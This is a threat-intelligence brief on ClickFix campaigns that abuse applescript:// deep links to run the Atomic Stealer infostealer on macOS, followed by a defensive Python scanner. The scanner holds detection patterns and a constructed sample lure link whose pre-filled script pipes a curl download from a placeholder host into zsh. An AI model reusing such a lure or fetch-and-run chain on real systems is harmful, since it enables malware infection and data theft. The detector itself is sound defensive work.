ClickFix Campaigns Use AppleScript Deep Links to Auto‑Run Atomic Stealer on macOS
What Happened — ClickFix attackers have abandoned the classic “copy‑paste into Terminal” trick and now use the applescript:// URL scheme to launch Script Editor with a pre‑filled script that silently pulls the Atomic Stealer infostealer. The one‑click approach dramatically lowers the barrier for self‑inflicted infection on macOS devices.
Why It Matters for TPRM —
- The technique bypasses traditional user‑awareness controls that focus on Terminal commands.
- It expands the attack surface of any third‑party macOS endpoint, potentially compromising corporate data.
- Rapid evolution of the delivery method makes detection by static rules difficult.
Who Is Affected — macOS users across all sectors; especially enterprises that provide Mac laptops to employees, SaaS vendors with macOS‑based development environments, and endpoint‑security providers.
Recommended Actions — Review vendor endpoint‑security controls for macOS, enforce strict script‑execution policies, and conduct user‑awareness training that includes AppleScript deep‑link threats.
Technical Notes — Attack vector: a malicious applescript:// deep link opened from a web page, which launches Script Editor with a pre‑filled script; payload: Atomic Stealer (AMOS) delivered via an obfuscated curl | zsh chain. No CVE is involved; the threat relies on social engineering rather than a software vulnerability. Source: Malwarebytes Labs
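As an added, defender‑side example (not from the Malwarebytes write‑up or this brief), the following Python scans fetched page content for applescript:// links and flags any whose pre‑filled script contains AppleScript's shell escape or a download piped into a shell, the delivery chain described above. The sample page is constructed, and the Script Editor query format (action=new&script=...) is assumed from Apple's documented URL scheme.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# applescript:// links wherever they appear: href attributes, meta refresh, inline JS.
APPLESCRIPT_URL = re.compile(r"applescript://[^\s\"'<>)]+", re.I)
# A download piped straight into a shell: the delivery chain this campaign uses.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(zsh|bash|sh)\b", re.I)
# AppleScript's escape hatch to the shell.
SHELL_ESCAPE = re.compile(r"do\s+shell\s+script", re.I)


def extract_script(url):
    """Return the pre-filled script carried by an applescript:// link ('' if none)."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        return ""
    # parse_qs percent-decodes the value; the 'script' key is assumed from Apple's scheme.
    return parse_qs(parsed.query).get("script", [""])[0]


def classify(script):
    """Return the list of reasons a script body looks like a ClickFix payload."""
    reasons = []
    if SHELL_ESCAPE.search(script):
        reasons.append("do shell script")
    if PIPE_TO_SHELL.search(script):
        reasons.append("download piped to shell")
    return reasons


def scan_page(text):
    """Return (url, reasons) for every applescript:// link; reasons is [] when benign."""
    findings = []
    for url in APPLESCRIPT_URL.findall(html.unescape(text)):
        findings.append((url, classify(extract_script(url))))
    return findings


# Constructed sample page (not a real campaign artefact): one lure link whose
# pre-filled script fetches and pipes a download into zsh, plus a benign link.
SAMPLE_PAGE = """<html><body>
<a href="applescript://com.apple.scripteditor?action=new&amp;script=do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fx%20%7C%20zsh%22">Fix</a>
<a href="applescript://com.apple.scripteditor?action=new&amp;script=display%20dialog%20%22hi%22">Demo</a>
</body></html>"""

if __name__ == "__main__":
    for url, reasons in scan_page(SAMPLE_PAGE):
        verdict = "SUSPICIOUS" if reasons else "applescript link (no chain indicators)"
        print(f"{verdict}: {url[:60]}... {reasons}")
```

Point `scan_page` at proxy‑captured HTML or a URL‑rewriting mail gateway's page fetches; every applescript:// link is worth a log entry even when no chain indicator is present, since the scheme has little legitimate use on a public web page.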